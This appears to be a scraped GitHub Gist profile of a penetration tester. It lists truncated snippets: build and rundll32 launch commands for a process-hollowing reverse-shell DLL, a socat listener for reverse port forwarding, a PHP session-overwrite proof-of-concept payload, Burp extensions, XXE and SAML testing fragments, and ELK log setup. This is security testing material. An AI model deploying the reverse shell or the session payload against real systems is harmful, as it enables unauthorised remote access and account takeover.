Skip to content

Instantly share code, notes, and snippets.


Frank Spierings FrankSpierings

View GitHub Profile
FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
// Run:
// rundll32 process-hollow-shell.dll,main 4444
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
FrankSpierings /
Last active Nov 6, 2020
Burp extension to minify a requests headers and parameters to another repeater tab.
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
FrankSpierings /
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
FrankSpierings /
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.
FrankSpierings / README.MD
Last active Aug 12, 2020
Windows Reverse Port Forwarding using C# / Powershell


  • On the lhost listening side you can use socat to create two server sockets.
socat -dd TCP-LISTEN:4444,reuseaddr,fork TCP-LISTEN:1234,reuseaddr
  • Once WPF connected to port 4444, you can talk to as if it where the remote host.
FrankSpierings / sample-php-socket-connect.php
Created Aug 11, 2020
PHP Socket Connect Example Reference
View sample-php-socket-connect.php
$host = "";
$port = 80;
$msg = "GET / HTTP/1.1\r\nHost: $host\r\n\r\n";
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, $port);
socket_send($sock, $msg, strlen($msg), 0);
$result = socket_read($sock, 4096);
echo $result;
FrankSpierings / README.MD
Created Aug 6, 2020
Session overwrite in PHP through extract - PoC


  • POST-ing a body containing _SESSION[secret]=1 will log you in, but only through the second extract.
View xxe-test.xml
<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY sample "KqsdwTrqAisGYNNu5XMhkUV4gTxm8ed8">
FrankSpierings /
Created Jun 29, 2020
If SAML Raider won't re-sign the requests....
from lxml import etree
from signxml import XMLSigner, XMLVerifier
self_key_path = 'self.key'
cloned_cert_path ='self.pem'
# Remove signatures using SAML Raider
unsigned_saml_path = 'unsigned_1.xml'
self_key = open(self_key_path).read()
FrankSpierings /
Last active Jul 1, 2020
Describes some configuration and scripts to parse Evtx files and MS-DNS Debug query logs to the ELK stack.

Setup Docker Elk Stack

  • Pull the recipe:
cd /tmp
git clone
  • Add the following to elasticsearch/config/elasticsearch.yml:
You can’t perform that action at this time.